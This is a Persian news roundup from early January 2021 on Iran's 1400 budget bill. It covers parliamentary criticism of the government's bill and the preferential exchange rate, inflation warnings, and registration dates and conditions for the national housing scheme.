۱۴ : لایحه بودجه ۱۴۰۰ دولت برای فروپاشی بود نه برای اداره کشور

رئیس کمیسیون تلفیق بودجه ۱۴۰۰ با بیان اینکه مردم سفره خود را در ۷ و نیم سال اخیر کوچک‌تر می‌بینند، گفت: لایحه بودجه ۱۴۰۰ دولت برای فروپاشی بود نه برای اداره کشور؛ این در حالی است که قرار بود دلار هزار تومانی بعد از گشایش‌ها تحویل مردم بدهند.

الیاس نادران رئیس کمیسیون تلفیق بودجه ۱۴۰۰ امروز (پنج‌شنبه ۱۸ دی)‌ در نشست خبری اظهار داشت: مردم سفره خود را در ۷ و نیم سال اخیر کوچک‌تر می‌بینند، ولی تلاش داریم تا حداقل برای درست زندگی کردن و آبرومندانه اداره کردن زندگی مردم کارهایی را انجام دهیم.

وی افزود: من به مواضع رسمی مدیران دولت کاری ندارم، چون اگر دولت در این سطح امنیتی مدیرانش را اداره نمی‌کرد و آنها هم نظرات کارشناسانه سالهای سال که از آن گوش داده و لزوم رفع رانت‌های ناشی از دوگانگی نرخ ارز در بازار را می‌پذیرفتند، امروز پشتیبان مجلس می‌شدند.

**نشنیده‌ام کسی از آنچه دولت تقدیم مجلس کرده، دفاع کند

رئیس کمیسیون تلفیق لایحه بودجه ۱۴۰۰ تصریح کرد: وقتی لایحه دولت درباره بودجه ۱۴۰۰ به مجلس تقدیم شد، برآوردهای اولیه آن بود که این لایحه قابل دفاع نیست و امروز هم من در جمع‌های کارشناسانه از هیچ‌کس نشنیده‌ام که از آنچه که دولت تقدیم مجلس کرده دفاع کند.

نادران گفت: تعبیر اولیه مجلس درباره لایحه بودجه ۱۴۰۰ آن بود که این لایحه برای فروپاشی تنظیم شده است نه برای اداره کشور، اما این هنر کمیسیون تلفیق و نمایندگان مجلس بود که این مریض بدحال و اورژانسی را به نحوی معالجه کنند که امکان ادامه حیات را برای آن باقی بگذارند و من امروز خوشحالم که اعلام کنم که بحمدالله نشاط جوانی و تجربه مجربان در کمیسیون تلفیق که مظهر مجلس است، ترکیبی را ایجاد کرده که یکی از بهترین کمیسیون‌های تلفیق را در سال‌های اخیر داشته باشیم و عزیزانی در این کمیسیون کمک می‌کنند که سابقه اجرایی، سوابق متعدد قانونگذاری در حوزه بودجه و سال‌های سال کارشناسی در حوزه پژوهشی کشور داشته‌اند و این ترکیب امروز به کمک ما آمده است.

وی خاطرنشان کرد: ما از بازوهای کارشناسی مجلس شامل مرکز پژوهش‌ها و دیوان محاسبات و مراکز تصمیم‌گیری که خارج از قاعده رسمی دولت به ما کمک می‌کنند چه در سازمان برنامه بودجه و چه در مجموعه کارشناسی وزارتخانه‌ها حداکثر استفاده را می‌کنیم و خوشحالم که به ملت عزیز ایران بگویم که ما صمیمی‌ترین مناسبات را با نمایندگان دولت داریم و حداکثر تفاهم برقرار است و نظرات استماع شده و در فرصت لازم دولت از پیشنهادات خود دفاع کرده و نمایندگان عضو کمیسیون تلفیق تصمیم می‌گیرند.

رئیس کمیسیون تلفیق بودجه ۱۴۰۰ خاطرنشان کرد: در مورد نرخ ارز این را می‌گویم که نه در لایحه دولت و نه مصوبه کمیسیون تلفیق و نه در هیچ سالی نرخ ارزی برای کشور تعیین نمی‌شود. برخلاف آنچه که گفته می‌شود، اگر به سالهای گذشته مراجعه کنیم همواره یک نرخ ارز محاسباتی در بودجه بوده است که وقتی نرخ ارز به نرخ واقعی کف بازار و حتی نرخ ارز رسمی بانک مرکزی مراجعه کنیم شکاف قابل توجه است.

**قرار بود دلار هزار تومانی تحویل مردم بدهند

وی تصریح کرد: قرار بر آن بود که پس از گشایش‌های دلار ۱۰۰۰ تومانی تحویل مردم شود، اما امروز اگر دولت بتواند دلار را در سطح ۲۵ هزار تومان نگه دارد، آن را جزو افتخارات خود می‌داند.

**معیشت مردم خط قرمز ما است

رئیس کمیسیون تلفیق بودجه ۱۴۰۰ تأکید کرد: برای ما در مجلس شورای اسلامی لایحه بودجه مجموعه‌ای از اعداد و ارقام نیست بلکه بیانگر تأثیر مستقیم بر مسائل اجتماعی، فرهنگی، اقتصادی و معیشتی مردم است بنابراین اعداد برای ما تقدسی ندارد و تلاش می‌کنیم تا از خطوط قرمز که همانا بحث معیشتی مردم است، دفاع کنیم.

نادران اظهار کرد: ما بودجه را فقط برای کارمندان دولت نمی‌نویسیم زیرا این بودجه، بودجه حزب دولت نیست بلکه لایحه بودجه عموم مردم و تمام کسانی است که تریبون ندارند و دستشان هم به سیاستمداران نمی‌رسد و افتخار ما نوکری مردم و ایجاد رفاه برای آنها است.

وی افزود: یکی از وارد کننده‌ها با استفاده از ارز ۴۲۰۰ تومانی، از کل ملت ایران که یارانه می‌گیرند، بیشتر منفعت کسب کرده است.

نادران در همین زمینه اظهار داشت: آیا ما می‌خواهیم این شیوه را ادامه دهیم؟ ما که برای انتخابات ریاست‌جمهوری اسپانسر نداریم، طرف ما مردم هستند. متولی و ولی نعمت ما مردم هستند. بنابراین به هیچ کسی در کشور بدهکار نیستیم و با هیچ کسی رودربایستی نداریم.

وی تاکید کرد: آنها از طریق انحصارات قطعاً تلاش می‌کنند که در بازار تلاطم به وجود بیاورند ولی برای این هم سناریو پیش بینی کردیم. ما بنا نداریم الان در حوزه مصارف و نحوه مدیریت واردات و بازار از آنچه در نظر داریم رونمایی کنیم.

نماینده مردم تهران در مجلس شورای اسلامی اضافه کرد: ما از آنچه در مجلس انجام شد دفاع می‌کنیم و از ایده مجلس در مورد دغدغه‌های موجود در خصوص دارو، کالاهای اساسی و نحوه‌ توزیع یارانه‌ها در آینده نزدیک رونمایی خواهیم کرد این کار هم به دلیل نگرانی از شیطنت و حاشیه‌سازی‌هاست.

نادران گفت: ما در بودجه مابه‌التفاوت نرخ ترجیحی و نرخ ارز بازار را داریم که در واقع حیات خلوت دولت‌هاست و به هر شکلی که می‌خواهند آن را هزینه و توزیع می‌کنند.

وی همچنین تصریح کرد: بودجه‌ای که قرار بود با ۱.۱ میلیون بشکه صادرات در روز و ارز ۳۰۰۰ تومانی بسته شود یکباره با دو میلیون و ۳۰۰ هزار بشکه و ارز ۱۱ هزار تومانی بسته شد که این نه تغییر رویکرد کارشناسی، بلکه تغییر رویکرد سیاسی بود. وزیر نفت می‌گفت برای رسیدن به دو میلیون و ۳۰۰ هزار صادرات دو مقدمه نیاز داریم یکی این‌که حاکمیت مساله‌ تحریم را حل کند که در واقع به این معناست که تسلیم نظام سلطه شود و دیگر این‌که در سه ماه ۶۰۰ میلیون دلار پول می‌خواهیم که ظرفیت را به دو میلیون و ۳۰۰ هزار بشکه در روز برسانیم بنابراین اساسا ارز ۱۱ هزار تومانی و صادرات دو میلیون و ۳۰۰ هزار بشکه جزو توهمات در بودجه بود که ما تلاش کردیم ارقام را واقعی کنیم و به جای این‌که رانت‌های نفتی به ۱۰ شرکت و نهایتا یک شرکت تعلق گیرد به همه مردم اختصاص یابد.

رییس کمیسیون تلفیق لایحه بودجه ۱۴۰۰ ادامه داد: اعداد و ارقام برای ما تقدسی ندارند و خط قرمز نیستند آنچه خط قرمز ماست منافع مردم، امینت کشور و معیشت مردم و حمایت از تولید و اشتغال است، لذا بی‌اعتنا به اظهارات رسمی مقامات دولتی و براساس پشتوانه کارشناسی و مصالح ملی به دنبال این هستیم که منافع به مردم اصابت کند.

نماینده مردم تهران در مجلس شورای اسلامی یادآور شد: ما به جای رد لایحه و این‌که دولت در جلسه سه نفره سران قوا به تصمیم برسد اجازه تصمیم را به همه نمایندگان دادیم. همه تلاش ما این بود که علی‌رغم ایرادات اساسی و مبنایی که با رویکرد دولت در لایحه و توزیع امکانات و تنظیم منابع داریم تلاش کنیم اصلاحات ساختاری بودجه‌ای را به صحن علنی تقدیم کنیم که مایه عزت برای کل کشور باشد.

** برای کاهش وابستگی به نفت و افزایش درآمد کار کارشناسی انجام دادیم

نادران اضافه کرد: ما در لایحه در بخش منابع برای کاهش وابستگی به نفت و افزایش درآمد کار کارشناسی انجام دادیم دولت برای برداشت از منابع نفتی ۱۹۹ هزار میلیارد تومان در نظر گرفته بود که این بخش کوچکی از کل برداشت از منابع است که در بودجه پیش بینی شده است.

وی ادامه داد: دولت بنا داشت با اختیارات خود حداقل ۳۹۴ هزار میلیارد تومان از ارزهای نفتی را مصرف کند ما این عدد را به ۲۶۱ هزار میلیارد تومان کاهش دادیم. نباید خدایی نکرده در تعاملات‌مان دچار خطای تحلیل شویم. دولت همچنین یک اختیار ۷۰ هزار میلیارد تومانی برای انتشار اوراق سلف نفتی در نظر گرفته بود که با توجه به سهم ۴۸ درصدی دولت از درآمدهای نفتی در واقع ۱۵۰ هزار میلیارد تومان پیش فروش نفت بود یعنی دو سال بعد هم باید برای استقراض در سال ۱۴۰۰ هزینه می‌شد و این یعنی تحویل زمین سوخته به دولت بعد دادن که ما این انحرافات را اصلاح کردیم.

رییس کمیسیون تلفیق لایحه بودجه ۱۴۰۰ با بیان اینکه کمیسیون تلفیق به دنبال شفاف سازی ارقام پنهان در لایحه بودجه بوده است، اضافه کرد: متاسفانه همه اصلاحات ساختاری که باید در بودجه صورت می‌گرفت انجام نشد زیرا ظرفیت اجرایی کشور توان انجام اصلاحات ساختاری را ندارد اصلاحات بیش از این بود ولی ما به این حد کفایت کردیم تا در دولت‌های بعدی و سال‌های آتی مجلس شورای اسلامی اصلاحات را رو به جلو انجام دهد و نهایتا آنچه آرزوی ۴۰ ساله ملت و منویات رهبری برای کاهش وابستگی به نفت است محقق شود.

نادران یادآور شد: دولت و مجالس در سال‌های گذشته از سال ۱۳۹۶ تا ۱۳۹۹ ارقام محاسباتی‌شان در بودجه چقدر بوده؟ آنها از ۳۶۰۰ تا ۴۲۰۰ و ۸۸۰۰ تومان را در نظر گرفته بودند اما آیا در عمل این رقم در سفره مردم نشست؟ در سال ۱۳۹۹ دولت به دلیل فقدان منابع ارزی دست ‌اندازی کرد و ارز در اختیار ۱۰ شرکت قرار گرفت آیا این در جهت تامین منافع مردم بود؟ اگر هشت میلیارد دلار را برای ۸۰ میلیون نفر در نظر بگیرید نفری ۱۰۰ دلار می‌شود آیا این کاهش ارزش باعث شد که مردم تصور کنند ۱۰۰ میلیارد دلار در سفره‌شان به نفع‌شان شده یا منافع به جیب دیگران و بعضا کشورهای همسایه رفت.

وی تصریح کرد: برخی کالاها حداقل ۵۰ درصد مصرف‌شان بالا رفته اما آیا مردم بیشتر از آنها استفاده کرده‌اند یا صرف قاچاق معکوس برای کشورهای همسایه شده است. آیا ما متولی تامین منافع و رفاه سایر کشورها هستیم یا مردم ایران؟ آیا اگر دولت قادر نیست صادرات معکوس کالاهای اساسی و دارو به سایر کشورها را مدیریت کند چاره کار حفظ ارز ۴۲۰۰ تومانی است؟ عامه مردم خصوصا طبقات محروم و متوسط مطمئن باشند این مبالغ مستقیم به سفره مردم می‌رود و دست واسطه‌ها قطع خواهد شد.

وی اظهار کرد: برخی کسانی که منافع‌شان قطع می‌شود حتما از طریق رسانه‌ها و ابزارهای در اختیارشان جوسازی می‌کنند فقط یکی از وارد کننده‌ها از یارانه‌ای که کل ملت ایران در سال ۱۳۹۹ دریافت کرده از قبل ارز ۴۲۰۰ تومانی بیشتر منفعت کسب کرده است.

نادران افزود: ما که برای انتخابات ریاست جمهوری و سایر انتخابات‌ اسپانسر نداریم ولی‌نعمت ما مردم هستند و ما به احدی بدهکار نیستیم و با کسی رو دربایستی نداریم، اما این افراد تلاش می‌کنند در بازار ایجاد تلاطم کنند.

رییس کمیسیون تلفیق لایحه بودجه ۱۴۰۰ خاطر نشان کرد: ما بنا داریم در حوزه مصارف و نحوه‌ی مدیریت بازار ایده خود را رونمایی کنیم ولی مردم مطمئن باشند جلوی انحصارات را می‌گیریم و اجازه نمی‌دهیم گرانی را به مردم تحمیل کنند. از فروردین‌ماه ۱۴۰۰ هر تفاوتی نسبت به تا بهمن‌ماه سال ۱۳۹۹ اتفاق بیفتد از پیش برای آنها جبران شده است.

وی تصریح کرد: ما در مورد یارانه‌های سوخت تجربه داریم یکی سال ۱۳۸۸ که بعد از سال‌ها مطالعه و انتخاب شیوه‌های مختلف قبل از گرانی قیمت بنزین یارانه مردم در کارت‌های سوخت آنها بود و دیگری سال ۱۳۹۸ که برعکس مردم همان شب و آقای رییس جمهور فردای آن روز فهمید بنزین گران شده و نتیجه آن آشوب اجتماعی و کاهش سرمایه اجتماعی بود و ناچار شدیم یارانه اندکی به مردم بدهیم. ما این مسیر را طی نمی‌کنیم و تجارب دهها ساله را در بودجه ۱۴۰۰ استفاده خواهیم کرد. اجازه نمی‌دهیم با این شوک درمانی زندگی مردم دچار آشوب شود.

نادران همچنین اضافه کرد: برخی عزیزان دولت که کارشناس اقتصادی هم نیستند گفتند با تغییر نرخ ارز محاسباتی و حقوق گمرکی قیمت‌ها چهار برابر خواهد شد آیا واردات کالاهایی که با ارز ۴۲۰۰ تومانی اتفاق افتاد نصیب مردم شد یا وارد کننده؟ آیا هزینه ارز ۴۲۰۰ تومانی را مردم باید بدهند یا تولید کننده؟ تولید کننده همه اجزا را به قیمت بازار تهیه می‌کند آیا درست است بگذاریم گوشی و موبایل ۶۰۰ و هزار دلاری با ارز ۴۲۰۰ تومان محاسبه شود؛ منافع آن به جیب چه کسی می‌رود؟ ما همه توان کارشناسی خود را برای این قرار دادیم.

رییس کمیسیون تلفیق لایحه بودجه ۱۴۰۰ با بیان این‌که نظام گمرکی کشور باید تک نرخی باشد یادآور شد: آیا این نرخ‌ها باید در جهت حمایت از تولید، اشتغال و مصرف کننده داخلی باشد یا وارد کننده؟ بخش کوچکی از حجم واردات کالاهای اساسی است و بخش عمده‌ای هم غیرضروری، جای جبران هم برای عامه مردم نگذاشتند عرض ما به دوستان دولت این است که به جای ناترازی در بازار ارز منافع حاصل از رانت‌های ایجاد شده را به مردم برگردانید.

وی خاطر نشان کرد: کمیسیون تلفیق در حوزه مالیات برای حمایت از تولید و اصنافی که از کرونا آسیب دیدند پنج واحد درصد تخیف مالیاتی قائل شد؛ ما برای خودروهای لوکس و درآمد بالا حتما مالیات بیشتر وضع کرده و می‌کنیم. متاسفم که دولت باید به این واقعیت اقرار کند که ضریب جینی به ۴۳% درصد رسیده یعنی فقرا فقیرتر و ثروتمندان ثروتمندتر شده‌اند و شکاف درآمدی زیاد شده که ما بنا داریم این نسبت‌ها را اصلاح کنیم.

**برای ما بودجه تنها عدد و رقم نیست بلکه آثار اجتماعی، فرهنگی و معیشتی در زندگی مردم دارد

نادران تصریح کرد: برای ما بودجه تنها عدد و رقم نیست بلکه آثار اجتماعی، فرهنگی، اقتصادی و معیشتی در زندگی مردم دارد؛ ما قول داده بودیم آسیب‌های اجتماعی را با ابزار بودجه علاج کنیم و بر سر وعده‌مان هستیم.

وی گفت:‌ تجربه عملکردمان در بودجه سال ۹۵ نشان داد که هر واحد پولی که برای کاهش آسیب‌های اجتماعی هزینه شد دهها برابر امنیت ملی و امنیت اجتماعی به خصوص در حاشیه شهر به ارمغان آورد؛ ما بودجه را برای کارمندان دولت نمی‌نویسیم و این بودجه، بودجه حزب کارکنان دولت نیست بلکه بودجه عمومی کل کشور، مردم ایران و همه آنهایی است که تریبون ندارند و دست‌شان به مقامات نمی‌رسد است.

رییس کمیسیون تلفیق لایحه بودجه ۱۴۰۰ درباره علت پیش بینی میزان فروش صادرات نفت در لایحه بودجه خاطر نشان کرد: من نیت‌خوانی نمی‌کنم ولی اقرار مدیران دولت در کمیسیون تلفیق این بود که حاکمیت تلاش کند تحریم‌ها برداشته شود؛ ما این توهم را کنار گذاشتیم البته حرف دومی را هم پیش بینی کردیم؛ نکته‌ دیگر این بود که وقتی دولت لایحه بودجه را تقدیم کرد سهم صندوق توسعه را ۲۰ درصد فرض گرفته بود در حالی که باید ۳۸ درصد می‌شد.

نادران خاطرنشان کرد: این مابه‌التفاوت با نامه رهبری در مورد حراست از منافع صندوق توسعه دولت را به هم ریخت. دولت ابتدا بنا نداشت به این نامه عمل کند؛ در کمیسیون تلفیق بحث مفصلی شد و دولت شفاها اقرار کرد از قبل تجدید محاسبات براساس اجازه جدید ۹۳ هزار میلیارد تومان کسری دارد. ما تا از دولت نحوه جبران این عدد را با نامه کتبی از شخص رییس دولت نگرفتیم کلیات را تصویب نکردیم و گفتیم تصویب کلیات موکول به این است که دولت مسئولیت جبران آن را برعهده گیرد و حالا این نامه در اختیار ماست.

نادران افزود: ما برای اقشار متوسط و کم‌درآمد این جبران را در نظر گرفتیم و هزینه‌های رفاهی آنها را پیش بینی کردیم؛ در کدام بخش بانک مرکزی و خزانه‌داری کل، ارز ۴۲۰۰ تومانی است؟ اگر دولت ذخائر بانک مرکزی که پشتوانه اعتبار نظام پولی ماست را به تعداد محدودی وارد کننده داد یعنی ارز ۴۲۰۰ تومان حفظ شده است؟ اگر امکان‌اش بود که این عدد واقعی باشد قابل دفاع بود ولی دولت سال گذشته این عدد را ۴۲۰۰ و ۸۸۰۰ در نظر گرفته بود مردم ارز را چند خریدند؟ مابه‌التفاوت آن کجا رفت؟

وی در پایان اظهار داشت: مجلس، تالار شیشه‌ای است، ما پول‌های زیر فرش را روی فرش گذاشتیم و جلوی دست‌اندازی به منافع کشور را گرفتیم.

۱۵ : یک توصیه مهم به متقاضیان مسکن ملی

محمودزاده گفت: متقاضیان برای ثبت نام در طرح مسکن ملی عجله نداشته باشند، چرا که اولویتی برای ثبت نام کنندگان نداریم.

تعدادی از متقاضیان ثبت نام مسکن ملی اعلام کردند که در هنگام ورود به سایت tem.mrud.ir برای ثبت نام در طرح اقدام ملی مسکن با خطا روبه‌رو می‌شوند.

در این رابطه معاون وزیر راه‌وشهرسازی درباره این مشکل اعلام کرد که این اختلال در حال بررسی است و به سرعت رفع می‌شود اما ممکن است در برخی از شهرها مشکل سرعت اینترنت وجود داشته باشد و یا حجم ورود کاربران در دقایق اولیه بالا باشد؛ بنابراین به هیچ عنوان متقاضیان در ثبت نام عجله‌ای نداشته باشند.

محمود محمود زاده معاون وزیر راه و شهرسازی، با بیان اینکه متقاضیان هیچ عجله‌ای برای ورود به سایت طرح اقدام ملی مسکن و ثبت نام در آن نداشته باشند، گفت: یک هفته فرصت برای ثبت نام متقاضیان مسکن ملی در این سامانه وجود دارد بنابراین متقاضیان هیچ عجله‌ای برای ورود به سامانه نداشته باشند.

او اظهار کرد: هیچ اولویتی برای ثبت‌نام متقاضیان در این دور از ثبت نام وجود ندارد و متقاضیان از امروز تا ساعت ۲۴ روز ۲۵ دی برای ثبت نام فرصت دارند.

معاون مسکن و ساختمان وزیر راه‌وشهرسازی با بیان اینکه ممکن است در برخی از مناطق سرعت اینترنت پایین باشد و مشکلاتی برای ورود به سامانه در ساعات ابتدایی ثبت نام ایجاد شود ادامه داد: همکاران ما در معاونت مسکن و ساختمان به صورت ۲۴ ساعته در حال رصد و پشتیبانی هستند و متقاضیان برای ثبت نام نگرانی نداشته باشند.

محمود زاده توضیح داد: هم اکنون ثبت نام در ۱۸۳ شهر کشور آغاز شده و ظرفیت‌هایی که در این دوره ایجاد شده بعد از اتمام مراحل ثبت نام اعلام می‌شود.

او تاکید کرد: متقاضیان هر ساعت و یا هر زمانی که در طول این یک هفته بخواهند می‌توانند ثبت نام کنند.

محمود زاده اضافه کرد: ایلام، بوشهر، تهران، خراسان شمالی، سیستان‌وبلوچستان، کرمان، کهگیلویه و بویراحمد، لرستان، گیلان، قزوین، مازندران، آذربایجان غربی، مرکزی، سمنان، خوزستان، فارس، هرمزگان، همدان و خراسان رضوی از جمله ۱۹ استانی است که در این دوره از ثبت نام ظرفیت دارند.

به گفته این مقام مسئول در تهران تنها در نصیر شهر ظرفیت فراهم شده است.

معاون وزیر راه وشهرسازی در پایان یادآور شد: شرایط متقاضیان در این دور از ثبت نام هیچ تغییری نکرده است و همانند دوره‌های قبل متقاضیان باید سابقه ۵ سال سکونت، متاهل بودن، قرمز نبودن فرم ج و استفاده نکردن از تسهیلات دولتی برای خرید مسکن را دارا باشند.

۱۶ : تبعات ولخرجی شدید دولت برای کشور

سیدامیر سیاح، کارشناس مسائل اقتصادی در توییتر نوشت: پارسال که درباره کسر بودجه و تورم زایی بودجه۹۹ هشدار میدادیم، دلار حدود ۱۲هزارتومان، سکه ۴میلیون و پراید ۵۰میلیون تومان بود

دولت در لایحه بودجه۱۴۰۰ هزینه‌هایش را ۵۹٪ رشد داده!

اگر مجلس، ولخرجی شدید دولت در این لایحه را مهار نکند، کسر بودجه و تورم به مراتب شدیدتری در انتظارمان است

سرخط مهم ترین اخبار اقتصادی هفته، منتهی به ۱۸ دی ماه ۹۹

 

۱۷ : ارز دولتی واردات کالای اساسی حذف می‌شود

رئیس کمیسیون تلفیق با بیان اینکه، ارز دولتی را حذف کرده و منافع ریالی آن را در اختیار مردم قرار میدهیم، گفت: ظرفیت اجرایی کشور توان پذیرش اصلاحات بیشتر از سوی مجلس را نداشت وگرنه اصلاحات بیشتری در کمیسیون تلفیق در بودجه اعمال میشد.
الیاس نادران رئیس کمیسیون تلفیق بودجه ۱۴۰۰ در نشستی که امروز پنج شنبه برگزار شد، گفت: ۱۹۹ هزار میلیارد تومانی که دولت در لایحه بودجه سال آتی برای برداشت از منابع نفتی در نظر گرفته است بخشی کوچکی از این منابع است، بر این اساس قرار است، دولت مجموعا ۳۹۴ هزار میلیارد تومان از منابع خود را از فروش و صادرات نفت تأمین کند که البته این رقم را به ۲۶۱ هزار میلیارد تومان کاهش دادیم.

به گفته این نماینده مجلس، بر این اساس یک اختیار ۷۰ هزار میلیارد تومانی برای انتشار اوراق سلف نفتی در لایحه در نظر گرفته شده بود که با در نظر گرفتن سهم صندوق توسعه و شرکت نفت باید حدود ۱۴۰ هزار میلیارد تومان اوراق فروخته می‌شد که این موضوع به معنای تحویل یک زمین سوخته به دولت بعد بود.

نادران گفت: بخش اعظم افزایش سقف منابع بودجه، ناشی از شفاف‌سازی ارقام پنهان و اختیاراتی بود که مسئولان اجرایی خواستار دریافت آن بودند. به هر حال با تغییرات اعمال شده این نوع مباحث به نظام قانون گذاری کشور برگشته است.

نادران تأکید کرد: به دلیل اینکه ظرفیت اجرایی کشور توان اصلاحات ساختاری را ندارد، اصلاحات بودجه در این حد اعمال شده است در غیر این صورت حتما اصلاحات بیش از این می‌شد. امیدواریم در دولتهای بعدی و سنوات آتی بتوانیم اصلاحات بودجه را تکمیل کنیم.

نادران گفت: نرخ محاسباتی ارز در بودجه های سنواتی ارقام مختلفی بوده است. به عنوان مثال شاهد ارقامی مثل ۳۶۰۰ تومان، ۴۲۰۰تومان و ۸۸۰۰ تومان و در نهایت نظام ترکیبی از دو رقم آخر در بودجه‌ها بودیم. در اینجا باید یک سوال از مردم پرسید که آیا این ارقام در سفره مردم نشست؟ آیا دولت دست‌اندازی به ذخایر ارزی بانک مرکزی برای تامین ارز ۴۲۰۰ تومانی نکرد و آن را در اختیار ۱۰ شرکت قرار نداد؟

وی افزود: اصلا اگر ۸ میلیارد دلار ارز دولتی برای ۸۰ میلیون نفر در نظر بگیریم یعنی به هر ایرانی ۱۰۰ دلار تخصیص یافته است. آیا مردم این افزایش درآمد را احساس کردند یا منافع آن به جیب واردکنندگان رفته است؟ از سوی دیگر حداقل ۵۰ درصد مصرف کالاهای اساسی افزایش یافته است. آیا مردم این اقلام را مصرف کردند یا صرف مصرف در کشورهای دیگر شده است؟ آیا ما با کم‌توجهی به قاچاق صادراتی به کشورهای همسایه متولی تامین سایر کشورها هستیم یا متولی تامین حداقل معیشت برای مردم ایران هستیم.

نادران گفت: اگر دولت قادر نیست قاچاق خروجی را کنترل کند چاره‌کار در حفظ ارز ترجیحی است؟ یا نباید چاره دیگری اندیشیده شود. مردم مطمئن باشند درآمد حاصل از تغییر نرخ ارز مستقیم به سفره مردم خواهد رفت و دست واسطه‌ها را قطع خواهیم کرد.

۱۸ : تمدید مهلت کارگران و بازنشستگان برای واریز آورده در سامانه جامع اقدام ملی مسکن

معاون امور فرهنگی و اجتماعی وزارت تعاون کار و رفاه اجتماعی از تمدید مهلت واریز آورده در سامانه جامع اقدام ملی مسکن برای متقاضیان دارای شرایط از جمله کارگران، بازنشستگان، مستمری بگیران و زنان سرپرست خانوارT خبر داد.

ابراهیم صادقی فر، گفت: تفاهم نامه همکاری میان این وزارتخانه با وزارت راه و شهرسازی در راستای احداث ۲۰۰ هزار واحد مسکونی برای کارگران، بازنشستگان و مستمری بگیران تامین اجتماعی منعقد شده است. صادقی فر افزود: در این راستا با انعقاد تفاهم نامه همکاری مشترک صورت گرفته با وزارت راه و شهرسازی، مقرر شد فرصت واریز آورده اولیه و تکمیل موجودی متقاضیان طرح اقدام ملی مسکن تمدید شود. وی تصریح کرد: وزارت تعاون، کار و رفاه اجتماعی پس از تجزیه و تحلیل اطلاعات متقاضیان موجود در سامانه جامع اقدام ملی مسکن و بانک‌های اطلاعاتی این وزارتخانه، مشخصات متقاضیان گروه‌های هدف شامل کارگران، بازنشستگان، مستمری بگیران و زنان سرپرست خانوار از جمله کد ملی، دهک‌بندی متقاضیان، بررسی وضعیت فرم ج ثبت نام کنندگان و… را که در طرح اقدام ملی مسکن ثبت نام کرده‌اند به تفکیک هر استان و شهرهای تابعه احصا کرده است. صادقی فر تاکید کرد: تسهیلات و اقدامات حمایتی وزارت تعاون، کار و رفاه اجتماعی در طرح اقدام ملی مسکن ویژه کارگران، بازنشستگان و سایر گروه‌های هدف واجد شرایط ثبت نام شده در این سامانه، متقاضیانی را در بر می‌گیرد که پرداخت اولیه از سوی آنان کامل شده باشد. معاون امور فرهنگی و اجتماعی وزارت تعاون کار و رفاه اجتماعی تصریح کرد: گروه‌های هدف برای بهره مندی از این تسهیلات حمایتی لازم است به منظور افتتاح حساب و تکمیل مبلغ آورده در فرصت باقی‌مانده نسبت به تکمیل موجودی خود اقدام کنند. آغاز دور جدید ثبت نام طرح اقدام ملی مسکنمعاون فرهنگی اجتماعی وزارت تعاون، کار و فاه اجتماعی همچنین از آغاز دور جدید ثبت نام طرح اقدام ملی مسکن از صبح پنج‌شنبه ۱۸ دی ماه به مدت یک هفته (تا ساعت ۲۴ پنجشنبه ۲۵ دی‌ماه) خبر داد. صادقی فر اظهار داشت: با توجه به پیگیری این وزارتخانه و اهمیت برخورداری از مسکن در بهبود کیفیت زندگی و ارتقاء شاخص‌های فرهنگی اجتماعی، فرصت خوبی پیش روی جامعه کار و تولید بویژه کارگران و بازنشستگان تحت پوشش سازمان تامین اجتماعی و صندوق بازنشستگی کشوری فراهم شده است تا در این طرح مشارکت نمایند.

وی افزود: در این مرحله برای ۱۸۳ شهر جدید امکان ثبت‌نام فراهم شده که مجموعاً با احتساب شهرهای ثبت‌نام شده در مراحل گذشته، در ۷۷۰ شهر، ظرفیت‌سازی لازم انجام شده است که فرصت بسیار خوبی را در جهت تامین سرپناه و مسکن مناسب برای عموم متقاضیان بویژه کارگران و بازنشستگان عزیز فراهم ساخته است. وی یادآور شد: کارگران و بازنشستگان متقاضی از امروز صبح پنجشنبه با مراجعه به سامانه https://tem.mrud.ir ثبت‌نام خود را انجام دهند. صادقی فر ابراز امیدواری کرد: با توجه به ظرفیت‌های خوبی که در زیرمجموعه وزارت تعاون کار و رفاه اجتماعی در زمینه تامین مصالح ساختمانی و نیز هلدینگ‌ها و شرکت‌های سازنده مسکن وجود دارد اجرای الگوهای‌های حمایتی متنوعی در دستور کار این وزارتخانه قرار گرفته است که زمینه کاهش قیمت تمام شده مسکن برای کارگران و بازنشستگان تحت پوشش را فراهم خواهد کرد.

۱۹ : حاجی‌بابایی: حذف ارز ترجیحی قطعا تورم‌زاست

رئیس کمیسیون برنامه و بودجه با بیان اینکه، حذف ارز ترجیحی، در لایحه بودجه توسط کمیسیون تلفیق تورم زاست، گفت: مردم توان تحمل تورم و فشار جدید را ندارند.
حمید رضا حاجی بابایی رئیس کمیسیون برنامه و بودجه مجلس گفت: تعدادی از دوستانی که در کمیسیون تلفیق بودجه موضوع حذف ارز ترجیحی ۴۲۰۰ تومانی را پیشنهاد دادند معتقدند یک بسته‌ای دارند که این بسته جلوی هرگونه تورمی را خواهد گرفت اما در این اینکه حذف ترجیحی(۴۲۰۰ تومانی) تورم‌زاست هیچ شکی وجود ندارد.

به گفته حاجی‌بابایی، آنها می‌گویند از طریق پرداخت یارانه می‌توانند جلوی این تورم را بگیرند به هر حال باید در خصوص این راه حل جایگزین منتظر ماند تا رونمایی شود، اما به هر حال باید منتظر تورم جدید بود.

رئیس کمیسیون برنامه و بودجه مجلس گفت: پیش از این نهاده‌های دامی که با ارز دولتی ۴۲۰۰ تومانی (طبق مصوبه کمیسیون تلفیق بودجه) وارد کشور می‌شده، از سال آتی قرار است طبق مصوبه کمیسیون تلفیق با دلار ۱۷۵۰۰ تومانی وارد شود (افزایش ۳۰۰ درصدی) یا حقوق پایه گمرکی هماکنون با ارز ۴۲۰۰ تومانی محاسبه می‌شود و از این پس طبق مصوبه مجلس قرار است با همان ارز ۱۷۵۰۰ تومانی محاسبه شود. اگر آن بسته تعریف نشود تورم را بدنبال خواهد داشت.

همه ما یک تکلیف داریم و حرف این است که معیشت مردم حفظ شود. هر مصوبه‌ای در مجلس یا دولت حرف اول آن باید سر پا ایستادن مردم باشد. اگرچه در یک برهه ضرر کنیم و دچار خسران شویم. اگر قرار به انتخاب بین حرکتِ اقتصاد با سرعت ۱۰۰ کیلومتر و سرپا نگه داشتن مردم بود، قطعا حفظ معیشت مردم مقدم بود. بر این اساس نتیجه انتخاب بین شکوفایی اقتصاد در ۵ سال اینده و حفظ معیشت امروز مردم، مشخص است.

